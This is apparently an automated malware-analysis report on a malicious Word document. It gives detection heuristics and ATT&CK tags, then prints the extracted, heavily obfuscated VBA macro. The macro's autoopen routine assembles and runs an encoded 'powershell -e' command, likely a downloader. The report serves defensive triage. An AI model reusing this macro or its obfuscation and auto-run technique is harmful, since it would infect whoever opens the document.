Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses a GetObject call, indicating an attempt to execute code. The ClamAV detection 'Doc.Malware.Droo-6903134-0' further confirms its malicious nature. The VBA script is heavily obfuscated, making it difficult to determine the exact payload, but its presence strongly suggests an attempt to download and execute a second-stage payload.
Heuristics (7)
- ClamAV: Doc.Malware.Droo-6903134-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Droo-6903134-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 56227 bytes |
SHA-256 (macros.bas): 977cee63909df0bd89d294e3549492f8477358fa7dc41ba5e83c0cc045c2835a
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "tkcoCQB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function s1ZUAZ()
If QXAAAk = d1UUZGG Then
PA_wAD = 113310848 * iACGxU
wGk1xX = i1GAUAxU / 266036998 / 780124235 + 562977434 * 7914962 / 847506671 + (kXQ_ZQoA - Tan(OAcxo1 + 605578611 - 467014396 - Oct(EA1ABwwA - Hex(249475745) + 844378493 + Oct(365272388))) + (381248980 / Sqr(17677404)))
EwA_wUx = 373947791 * DxGUZCQ
End If
If KADZcQA = d4cBXo Then
uQAAwwA = 111163196 * oAACAA
EAA1_A = qAAZAAA / 191966422 / 585351310 + 425436490 * 828541278 / 213059773 + (IUZAkA1A - Tan(zCAAQBAB + 315546895 - 827630960 - Oct(kcAcUUD_ - Hex(212234006) + 681109503 + Oct(258279385))) + (393750373 / Sqr(263095872)))
HxAkXQ_Q = 845345808 * WxDAAA1Z
End If
If iAxABC = V4Q_kU Then
AQBUA1_D = 74208668 * RXCUAxx
AZUAcDBA = jXUD_c4c / 591323130 / 361609455 + 858908795 * 681825759 / 562495997 + (Yc_XAAk - Tan(oZDxUD + 446740246 - 222623987 - Oct(hDCD_A - Hex(742385990) + 48265074 + Oct(410231027))) + (682724074 / Sqr(48578684)))
EAZUUAUA = 509623743 * QC4BBQA
End If
If EBBXAXkx = PAZAkcA Then
GBBDAxAw = 147687551 * WkGBQUU
vBcACZAA = DZAAADA / 480953450 / 242554964 + 161362378 * 882338055 / 964671034 + (bxXDAZA4 - Tan(zBBAAAk1 + 400021814 - 525539996 - Oct(NGAZQA - Hex(164580386) + 683957846 + Oct(800657767))) + (947657366 / Sqr(581195208)))
wAQxDo_A = 221291665 * nAAAA4B
End If
If ICGwDUB = VABBAQxZ Then
nQAoAA = 393366826 * QZ_DAAA
uA_1kkA = OA4oBc / 200783572 / 330518127 + 771895554 * 829846440 / 53456877 + (zcUQ1C - Tan(dDQB4QA_ + 658028736 - 208998653 - Oct(qkQAAC - Hex(459867681) + 145418888 + Oct(472798286))) + (496762903 / Sqr(982621908)))
qBZoDBoA = 552077676 * qACw_ok
End If
If qAQAcZ = MDADUGA Then
KCc1AB = 840129224 * lQxZAA
dDXUB_ = oADcQcGk / 387014576 / 980086202 + 346116226 * 207352287 / 12310465 + (wDcQXQA - Tan(dUkAUZA + 493587671 - 686607011 - Oct(kA__AkA - Hex(107873806) + 813767245 + Oct(576825001))) + (298802501 / Sqr(300558943)))
MD4UDXxB = 744452207 * sxUADB
End If
If QAUAwG1C = cDxUAAGB Then
wAxQU_ = 824260369 * tAZwZ_G_
TUAAZAwD = uBwAxAZw / 858059403 / 875590836 + 768239316 * 856978656 / 159733552 + (bABQAccB - Tan(aAAZAX + 372210536 - 626644529 - Oct(BDAXQcA4 - Hex(230344455) + 65022417 + Oct(511261916))) + (548598393 / Sqr(98259149)))
iDBCAAAZ = 983582163 * WACUUwAA
End If
If wABAAx11 = zADcccQB Then
FAwZcA = 76041018 * EwGAAo
pkBkAQA = r4BBAk / 127883249 / 124147830 + 868789810 * 289112633 / 525893147 + (JABwBGAQ - Tan(C_AAAA + 843981742 - 101644624 - Oct(kQZAQG - Hex(89432407) + 534669831 + Oct(686141805))) + (883227102 / Sqr(588299302)))
DAABAC = 752229546 * a_QDGUww
End If
End Function
Sub autoopen()
On Error Resume Next
If YAoAXA = aBAAAU Then
C_AAQAZ = 153741829 * iDDcQA
iBXBDA = qDD14A / 281672194 / 129152302 + 974500169 * 826491732 / 593702330 + (CQUXCcAA - Tan(bZAACA_U + 722302278 - 191173025 - Oct(IQBAZAC - Hex(999401335) + 944559283 + Oct(326783304))) + (970880771 / Sqr(555644868)))
YUA_11 = 282215570 * oXDAcZAo
End If
If zQc4UAZA = fG_GAA Then
nUAA_DA = 825526443 * QBDAwQBA
iAXoBB = hADAUUDc / 835889826 / 130091923 + 313313953 * 883022069 / 457318193 + (qZGCAAG - Tan(nQAAwA + 261490904 - 594019978 - Oct(JA4xoUD - Hex(272615991) + 951292716 + Oct(428297665))) + (721890307 / Sqr(109613575)))
zDDoADwc = 152948901 * v_AAQoU
End If
ZDGCAXA (TA41_AD + "po" + KQoAGGDw + "wersh" + wAACAAUZ + "ell -e " + JAGAAAGG + XBxACBQ + jZ4AAC + OZXDZx_Q + RAX1AAA + PGGZo4 + RAUQDBU)
If aCCAAc = GAc4Zk Then
IAoA4B = 301061720 * CQDGwAA
hAA4GAA = FUcZw1 / 908857049 / 322748241 + 467095128 * 806190665 / 860382067 + (i1ABXkZ - Tan(iAA_UBQ + 6484553
... (truncated)